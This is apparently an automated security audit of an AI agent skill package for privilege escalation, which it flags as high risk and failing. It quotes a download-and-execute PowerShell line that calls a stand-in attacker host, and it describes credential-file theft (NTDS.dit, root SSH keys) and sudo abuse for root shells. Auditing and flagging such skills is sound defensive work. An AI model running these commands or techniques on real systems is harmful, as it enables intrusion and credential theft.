Privilege Escalation Methods
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: HIGH
Flags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains commands that download and execute scripts from external sources at runtime.
  - Evidence in 'sub-skills/active-directory-attacks.md' uses 'powershell.exe -c iex (iwr http://attacker/shell.ps1)' to execute a remote payload.
- [COMMAND_EXECUTION]: Extensive use of commands to gain elevated privileges and manipulate system services.
  - Evidence in 'sub-skills/linux-privilege-escalation.md' demonstrates abusing sudo with binaries like vim, find, and awk to spawn root shells.
  - Evidence in 'sub-skills/windows-privilege-escalation.md' uses tools like SweetPotato and PowerUp to abuse system tokens and services.
  - Evidence in 'sub-skills/active-directory-attacks.md' uses schtasks to create persistent tasks for command execution.
- [DATA_EXFILTRATION]: Provides methods to access and copy highly sensitive system files containing credentials and keys.
  - Evidence in 'sub-skills/credential-harvesting.md' includes instructions to copy the NTDS.dit database and SYSTEM registry hive using Volume Shadow Copies.
  - Evidence in 'sub-skills/linux-privilege-escalation.md' uses tar to read and package private SSH keys from /root/.ssh/id_rsa.
- [EXTERNAL_DOWNLOADS]: Recommends downloading and using a wide variety of third-party exploitation tools from unknown or untrusted sources.
  - Evidence in 'SKILL.md' lists tools such as Mimikatz, Rubeus, Impacket, Responder, PowerView, and PowerUpSQL.
Recommendations
- AI detected serious security threats
Audit Metadata